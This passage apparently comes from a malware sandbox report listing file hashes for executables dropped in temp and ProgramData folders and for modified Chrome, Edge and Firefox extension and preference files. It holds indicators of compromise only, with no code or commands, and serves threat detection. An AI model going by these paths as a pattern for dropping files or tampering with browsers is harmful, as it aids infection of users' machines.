| SHA512 | 007848ab3056db32eb6bced18e3d0f27ef3493608e0d842665f08ddf0bfbdd6bf1b12f106abaf229c5ba61eca7e4e6a91a2de9c5243d91db60148f7af7469af1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 2812687beb228e76e62ca91104efbb4e |
| SHA1 | c0a06063175065ff3577a4d2c90c7875cde9ca61 |
| SHA256 | 8da872102aee16b6bd279e9950d36ab5a9f49998c7fb8f1d892b196de3da2bbd |
| SHA512 | 74734c43b2757a3013de203a00334e806dea33c4cea582a678f88084190d93d8c0f728a8fd08b8764dc6a2ff74fded4b2bb9f2e8c52d8a30b7448fee29ceddea |
C:\Users\Admin\AppData\Local\Temp\7zS5A07.tmp\Install.exe
| MD5 | e9eba0f1f97170cfde7be2a9b83f6586 |
| SHA1 | 3910fdae6c2e667514f7801ae71a809877e7eb5f |
| SHA256 | d2e0982a7b9597745564f55f6eb0e359bc260e5309d503e3407e9d42cbd2879e |
| SHA512 | c83cb3e9e4b17f9ed9822de25ae273dd1e57e1a365966def748f9b17e04aa8e2e05148a63c0e738d207fca2903f244b623248035429de52f9404728e2fefc582 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 242b9970bc27feeeda287d80603ceb5c |
| SHA1 | c1676ef2245147893f5267e12fa67942bfb84e97 |
| SHA256 | 62024a57c2c5d052c77e7d0e9bd0735ffbac052be99321f4bebbf226af620f13 |
| SHA512 | 144392fd5b2d5351ef8503511d160d1bc3ba4846a9acde5321516edd498f1956b4cd9196360f0ad0001d4e6cbba2b91df40b981f8b5f4baa1464a781438a3b90 |
C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe
| MD5 | a287207da323c8246e4cba5b91f287e8 |
| SHA1 | 38cb0ab23fca848500cac39500982fa2be9ce4d0 |
| SHA256 | 3b7e6a706d8ad62163b1988eea25fbdef0fd9874141f6db224ee3ab4ffccea15 |
| SHA512 | c1a87c28da2b13dc1b1dca0e779ba3c549e4b6d0140d3a92bbc0a7381af712f868e340a975f1341e9ea90db8dbb15addf4246f5bd716944ee3cedb0cd32be8ae |
C:\$Recycle.Bin\S-1-5-18\desktop.ini
| MD5 | a526b9e7c716b3489d8cc062fbce4005 |
| SHA1 | 2df502a944ff721241be20a9e449d2acd07e0312 |
| SHA256 | e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066 |
| SHA512 | d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88 |
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi
| MD5 | 27a7d0d3cc1a8b75fd504f76778ced91 |
| SHA1 | 5c50dfffd0a6a67ce30c4038708e28742dd98a6d |
| SHA256 | 1f0010b2566d79ab5a89323cf1e5fa763455bca616b2ccb0c00dacc33fde656a |
| SHA512 | 2f561d76046461c97537172a72caaf1f5773895c18c6a785cef768022e377ca96be76fcd1ac51d304fa313371bc7edea0a1e33b7c91add0e897fc7e65e0610c5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.json
| MD5 | bd6b60b18aee6aaeb83b35c68fb48d88 |
| SHA1 | 9b977a5fbf606d1104894e025e51ac28b56137c3 |
| SHA256 | b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55 |
| SHA512 | 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3zxqty5.default-release\prefs.js
| MD5 | eea6542fe5d9c0c181fc6e23cc08959c |
| SHA1 | a1a92f62d547d0394005b63047fdf5a456df67b3 |
| SHA256 | 15256a779820d94ad2ef09fa5ea27f9dff8cdc9e102a63d979ba0273f70fec7f |
| SHA512 | 9125a1362070aa63fb6a496c003bdb4ddcda02bbf191235ce3c8b44896a48753f035caa1b306314e7c4a7500848e6352e0a7384044cc011be59597e573e8dd10 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 209f22c0f0b2cfadcf132eaf7b24b212 |
| SHA1 | b0de6df94f84c4125effe7cfd4a91a74e6090dae |
| SHA256 | cfacf0824f1cbefe99f21cbb9cdd321ff1510071c2ea837a193706e6d8b47172 |
| SHA512 | d5ee65d8742c38e4fe0f6d13dcec44f8e227b20279cfdfd55f18a858014b908febb9817e66b085ab9f3fa1950022e99665c0d6f70c67943f452fb3fcda8491c9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c261b255de3000fc5240f5a45f8d2e7a |
| SHA1 | ec209fa1df536e8f409bbd5bb9fb9373bc726827 |
| SHA256 | e7c9987a6c207c4359c6a12398fca92df14f040e92b63f3b38e633e820deeaf7 |
| SHA512 | ae11cc17b351ed53528d68690ce518e322f8643ea804c3fd8417cc97a65751796a62d195db3233eae0e9f5f7ba717d06be275b855fd40c160c2310f51cfe36fb |
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
| MD5 | 0c1f96ef7290e9878e11070d7893d63a |
| SHA1 | b844fac5f1f8169edfcf03f0597070b238d2aea7 |
| SHA256 | 1aafc84f8bee9cc2d5e49f6c9c964dfd098c07581db9d83715d0c007ee006a8c |
| SHA512 | 38286bebcdb2c982d1ac0f1ee32c96c2cfd329787e7e069061dea2e935e907cf4f5e84e757bb086c4e790d6b8e2db2a780602fa4931b048806e5e557c9354cdb |
C:\Users\Admin\AppData\Local\Temp\1000078001\hv.exe
| MD5 | c04fb6fd0153009aed24dee63047c4aa |
| SHA1 | 120dadef65d907eb09898d7dcd3e4ee99b7f763d |
| SHA256 | 107732c9883b6616b6c6398234d6e44843de70e8724023d62ca3e908019e58e0 |
| SHA512 | f4356784b6586bc3dfd438fb0d166cdd9910ce8f70110443997bb449c49f14306c8535717bc3e6d05017586d39fd2b11fdb9efcd72068eab333f0aa09f01ec52 |
C:\ProgramData\pinterests\XRJNZC.exe
| MD5 | e6feb2feedcd40debe9652807abe05a2 |
| SHA1 | 960c00c0247a8002fb2c750915239d058d28c6a6 |
| SHA256 | c4e7f8b515bb1affff353fc47f448d67656e8adad59e5124231d314266c12d64 |
| SHA512 | eb908d5a9e8608bb1b48acdffcb176d94adc2d29d550637755c2ae025f5c7943520dacfc95995772e9fd1e7c4267dc18b863c4a0221208fb06d77f8f68f8229a |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 7c83913074bd63de6b79962f618611fe |
| SHA1 | 3622278c69f6943345e7ade627f5932d411c223b |
| SHA256 | 83b6897bcdac339ceb0a6c5e758a5c574243c3ef35bb36078a048265e25261dc |
| SHA512 | 06735a26ed2b9f97f539512ff610322ac5aef76b8484d18f88eb22d30a467b74f97376cbd514bed4b97b5ab4768ad43be0b5ac3d135fc10116ec40a81b91df95 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 76d27b732dfc81bf1f398f9b6b99b87d |
| SHA1 | 44dc29f8f63a92980574c8cd4bec07dca852a6e4 |
| SHA256 | 4731d960442300eec4581f8352d0a34d0aa44401f36402ebcf5b35a12ba9c60d |
| SHA512 | dc11fdd7fa13e631dd8825d86440254281137fbd897512a2c41f5227764c8062215fa8d20546459772b9de88aef397da724e33d43024b74b5252de570f1c5d6e |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\de845e8f-5b65-4d9d-a516-fd6402cb018d.tmp
| MD5 | 3857e11615616c96f6bc18b5f8e738ff |
| SHA1 | 6f676cc6e46c7c96397cda922179f06d5ff43551 |
| SHA256 | a347e62c21d140b28e9f151342e8064e098567cbd14980f6ebbb086573601bfd |
| SHA512 | 88744b682693ed2cb2b9a0ceeb4a3d8e6ee4b86aca33640f3d47216652d74bec4099c2a28d9fee044a8019a3ea2e020ae94e4a41ab2f4ffc5b87671cd7a90782 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\a527e985-f7b0-45f2-a33d-05514db5a087.tmp
| MD5 | e5e3377341056643b0494b6842c0b544 |
| SHA1 | d53fd8e256ec9d5cef8ef5387872e544a2df9108 |
| SHA256 | e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25 |
| SHA512 | 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef |
C:\Users\Admin\AppData\Local\Temp\tmpDDB5.tmp
| MD5 | c9ff7748d8fcef4cf84a5501e996a641 |
| SHA1 | 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9 |
| SHA256 | 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988 |
| SHA512 | d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
| MD5 | 5513ace1a01bd9a91b7ef2a0e6fdd943 |
| SHA1 | 6780837197d8bd4297ac3634283f9eccb927b97f |
| SHA256 | d5db062287db742209be73ba2a9dee0e475e62d3f7580a1c6700b8e0f02c65a9 |
| SHA512 | 52697135f4c1ac9bada6e8c9e496c864c5a0d889ce19f3f2833eedfc47b23e70e53e7e3460963365365951636afe6ddb2af45d0ed5b59de80bf7b78c39ea38df |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
| MD5 | cf89d16bb9107c631daabf0c0ee58efb |
| SHA1 | 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b |
| SHA256 | d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e |
| SHA512 | 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a373932a89564a2acb28627ded7743a2 |
| SHA1 | f2ebc5b5325d37c526ee475bd8feb8cd3e74941f |
| SHA256 | 005a3b21569c2f251f08c9199b438964a7870cf4e65330de188d23bed855d5a2 |
| SHA512 | f0727354acbd0651d5c7982f4e2238b3b0ce8e260ace70a852a3f71c05667916f46c264b7c825e9b3ba041d4cd64b8eaafc78c26de0309a55b4c799f3b13b414 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 34843d916d5e6ea73e1df8b3e626c831 |
| SHA1 | 5d8bc2b31ff6ce3787dac0d0e7d06e38aa9991eb |
| SHA256 | 85c82e149523bc612214fd32ab06d0fe4001a1423cc1716f0da519cf2db59d19 |
| SHA512 | 84b26ca13c971f2df333091130e7637c7861e1186212342671eefa5df8529cbe0865fea488ca137aff73e3fc433c21ccf79bb10398b8418d1578bffaa7177082 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RFe67059f.TMP
| MD5 | 4d4d6b0cd3fec9d09432d55d08e4b7f0 |
| SHA1 | 196054fdeded57fbabf40c95e8afa066bbc25d89 |
| SHA256 | 06cad0a1ee1a5eeec054e9624b34bcff557a486a50975f59903e3f52642659e7 |
| SHA512 | 68edc21638db7966fd4bccf6f7d4472913d44905b66c10d980278d73e2956c9f67af207b084fe450b040f3dee120dd1083e610640be7b918cba2cb5883b37ca7 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Spelling\en-US\default.dic
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State~RFe672491.TMP
| MD5 | c480e1d586f5cb439a3072f2bcf4b3a6 |
| SHA1 | 0709e1f5c4cc3c072df39069d07dfea9a2062e4f |
| SHA256 | 1138019d7635bd00b6fcd99d71ee6d19dbef5e3a64ee3612feb24e370bf67240 |
| SHA512 | 4014fbfdab4fd25585d5527019a5b9f1ae6d1bb668cfb023330331d325de04543631f4f6079f6c12c2a986a143f64546edb1006f07970dc7ba46acd61f038109 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6afb72dd52f81b6789ad838c0d8eca2e |
| SHA1 | 10aec492bc623d7785d14bf8d3c4863d1c068029 |
| SHA256 | 22d61a166149483bcd571d00193314f2eb3e6033a0e1b4d8514ba7319dcd76c7 |
| SHA512 | 307df25897b68bc52b14e1358f74f2113d8217f01529eb236a8d841b934c361119503691d4a354c8382c8b3f62fc9860288da5f224385409b4263d05ee89db9a |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 3bebd36901609d2d02c34a0756c86bd4 |
| SHA1 | 3c6697d548599d63fbadebd9228f41bb1d0a211a |
| SHA256 | f33b2bc22ed852ebd9a8a9ec0458259aa7e3f1e302088c8c8e0a981948a78fa4 |
| SHA512 | f4d167155fc69e9f7faa1e91f198ef56a471240315f193d49e950807d456659531cdf981035a5cb714bebfac35d3b9701f0361c5a25458ffcda9c8ab4a07726c |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 07829b52e8fb1c3b088ee15628c2f872 |
| SHA1 | 2c65b4d67669bbeddf8fe1f38b0c5fe9a76147a8 |
| SHA256 | 172607de2e98b32003754742aa7a562ea5c9af0779233392322325827009abc0 |
| SHA512 | 40931b0f44ec370af3c971719f91ebed6ef511534299b63babb68ee45308e18105d5816102ed9985c800aca7eeda15fc1be8b6e055438f2547ef5514da9ce2cb |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c3f90ffa9caac56174c03f18d968974d |
| SHA1 | e593af1c14abd39ea4a40d539e3dc4b629f41012 |
| SHA256 | 5ff9769c15154b6330e8fd25a5627781544c669113e4ebc03871c0fcf8550021 |
| SHA512 | 9c49112d670e8af415d8d6b1f51359a75a4d04f010a4546cde1ded4f362926c180214afef07d7c93c55cdf40782b5d4d8e10502a938f9a81746d03c1175346bd |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 11f23622e272631359f9f544f1a87bc5 |
| SHA1 | 120c60af42ca454121e5fc5a51306732c791f63b |
| SHA256 | e750ff751f415abfba6cd45f30e148cfc0890ced3edf9d6f05e95e6ac05abf2c |
| SHA512 | a4f6b4818ee487754ff65f4ea3af730413afcec51782d03f4112dee6dba9e42434c128221b729e46b3862c562f179e5795c876edb01a3d67e63bce7b86e6ff52 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 60a28585c960d376bff1479c1eb7a170 |
| SHA1 | e2e9c43f5d67d9ee20a6aab078c354cf454f1397 |
| SHA256 | 6fde18fa2c94bd675baa28acb5b71cbb46f3d0fd3035d465cfa931fc0e71821e |
| SHA512 | 19e7e533ea133505e070b3a31e76ed66fc49944874d39f9661d23eb6612fda83049ea8d36bd1699abe2bc62cdbd8fc78718a4788d799f00c22308e165c0f6e4d |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | a3d7512ff80e7f1eae881b83d366daf4 |
| SHA1 | 65f71aa3d3660be15c7f5eb6c0f28561ef277d7f |
| SHA256 | 9501d850539c2d35fea17c4434ae32db634dcc2c850661fc8b369f39bce3bffa |
| SHA512 | 6867aa095e62cee5e87a5cf911ccaf80e7c3f67960494465c412318ab7f17a12c2062b39258a3bd6effb21898bcd93027a6941455766c6e2bbda91f3d2f2e698 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 2800881c775077e1c4b6e06bf4676de4 |
| SHA1 | 2873631068c8b3b9495638c865915be822442c8b |
| SHA256 | 226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974 |
| SHA512 | e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 9a77a67e309121bf1ee233b6383a6765 |
| SHA1 | 5afb24402b017cf9f547b7ba23bc1f10d32d6126 |
| SHA256 | 75f7dd16fcfcfb9e52e99b6c32eae06b8c378735de755445f1df7d9afb934d71 |
| SHA512 | a212e9ec43b33fa1191ed818c516f98d7750527e4d6a06635d3143807b6ab151b42b9edd118d0c88330661ac8ec2a2a5f07c56f98a7126fc2cdb836b5f7b8fb2 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9cc8b95924d2fd707bacfe6d2baf6a54 |
| SHA1 | 56ce6614acea7c9ea9a045d5e2706f43c9fa2c0f |
| SHA256 | 0109885fdc70c4683e89ff30b8f8766b2089a5f8621816b3830033f7ed5a0ea5 |
| SHA512 | 61cc29ea1df0125c7a0018c27600cc0c298b391361c936d5e0bc051431339602e9e27576d71f71d5ff1391e59ce760712c4848e7ca3947356214cd0953f67c08 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8219ddbbfca07f9812770fa2e0222559 |
| SHA1 | b9f930dc12d5ab4498449e0f588a897269b3f6d5 |
| SHA256 | 0c347828c9d8f2ba33f715115ece4fd30d9efe6710ed9500de7e06861ab8d80f |
| SHA512 | 2caa8b775e60ea30dfb7d141f5ed0f8175baeac1075e226bfff995c458ca3a3179628883b6ae97839021d269896a08d98801cc2afb37ae3a4c10e549620868c9 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 77e904d64f938e0e0e447a73eed21e94 |
| SHA1 | 9ad88bff634c8c397e3cf983e3ed94cf3cea88a5 |
| SHA256 | e8c667d2bd63b4905b84ebe70c926952cbb1e82906eca391f8d453f9458b8800 |
| SHA512 | 9d0c9f8d2058b3a3317d70efd1eef52c4201ee3c4c3ba575f0ead4065c9bc1ac4734fd678b6015d36ebc17a2f200f5c34295b8b5d49e9ccb62116befd84dbde2 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 5a93f07f987d34462c69102cc6c64b8b |
| SHA1 | c4effc4228ff653ae64fd3f919b40ba97c71ee48 |
| SHA256 | bee9bd6f0e77d8213d0e2cc04c73c337268e05255504004215c26a18e59a0263 |
| SHA512 | b323712d70e5923b597a801851dc47ec4aae0ef1cde4a71a6d7349091a64df1f3051a2c89b01cf48c0b9b02707412f2cf6d4e98039b4362fc85c37c13a6a9fb3 |
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ea1321a127b4182467e3092a94f5df4c |
| SHA1 | 444414fcfdc837413747e18f6f6cde60a43034f9 |
| SHA256 | 9028da0dceb666bd340b5bb267449cca0fcbdbaabb0a33d132eff28411c16cf2 |
| SHA512 | 7ff5d2cbe3f416b32c03c31f82fdd1a60119c43c71959974b99e9e7705f6cfbc366651bdb805fe9b5addbba03365351f72a6b722ba32573fd155a35dd52b0b7a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 71602891036200e9216b31842ce1906a |
| SHA1 | dcbe61b7dc828fe99241c597ced2fc364564f1d9 |
| SHA256 | c3bdfb0cadf8b6f4b6a49e13170cf1e6174837abd92b693a69ab34a1181a71ad |
| SHA512 | 6406640c039f6cf654b5f3d076c0f7618e62fcc30359d266b6f5d804427c4fc04b4a8f803161855a00cf060fda08d5c74a0c442fccde50555ddb236baa908442 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1189bb05-e4da-4f10-a9d5-925afcdf03e2.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | b6f4eabb7b359e9afedcf58f0e81a2be |
| SHA1 | 60be45e51dc2df6999c07b792ea51b61baa3a9bc |
| SHA256 | 162b83bcf9c66ef137df1e9e845ea7533630a15fe9ad24a119d5b155e5cf6f28 |
| SHA512 | 6929ca5690a1b1f936b2f57b74956143834125904764f17e29bfa105452c83f15536b7906c39da2967c210479dfe445025d4750bef6ed5a9ecab4c72fed7bd2a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ff3fed9037726867bb64a0d1c992d612 |
| SHA1 | cfbe63b798ba3d2a556f0e0c30bdf8b810bde426 |
| SHA256 | 7ae3fb469b2fef76b846a236de1847cb56a4c4d73d914dc690850323f42b353f |
| SHA512 | 6e24a1ba297ad4a1db37bacea487d3cb2d7ce2ca063cf595b5c1b9f95f405cc1b6d54e9d5b95729a786144f74fb4fe8ec7d0914252ee77347df9d5a06c822ab9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | becdafdad4246306e2b2ed16d0b24d50 |
| SHA1 | e807ea964d2e14493b791fc9ced6c7d309527718 |
| SHA256 | bf8bd359374b479131030d76e849a0c3923e33cbb0534411926cca34f4e96410 |
| SHA512 | 029eb242bc793ef0b4af4052c56a03fc034f55445dbed37b78c38c9a88d00effab3522e4c8c837a696f68bd9b252209ef69aebb1e02fc3d8cdd1c431f1b7f662 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2e3bf31ba4c998b43c0bd99b084c9f35 |
| SHA1 | 2f838b8e215e9c22522d564c2103518c468cd37d |
| SHA256 | 7cb986538e8681a7f6fa308ec23fe862c8503910dbefbeab8ece8200d5efe822 |
| SHA512 | 01e7e21707d90e355c820163cbc6808ab28ee962ee8e7a93e4f440867879b2a5e51a94923011b1892203bdc8b42548ec4d4698a563a23aa60bb5375406a8943c |
C:\Users\Admin\Downloads\Unconfirmed 620681.crdownload
| MD5 | e932f34e77043e84a9313bb0efad25b4 |
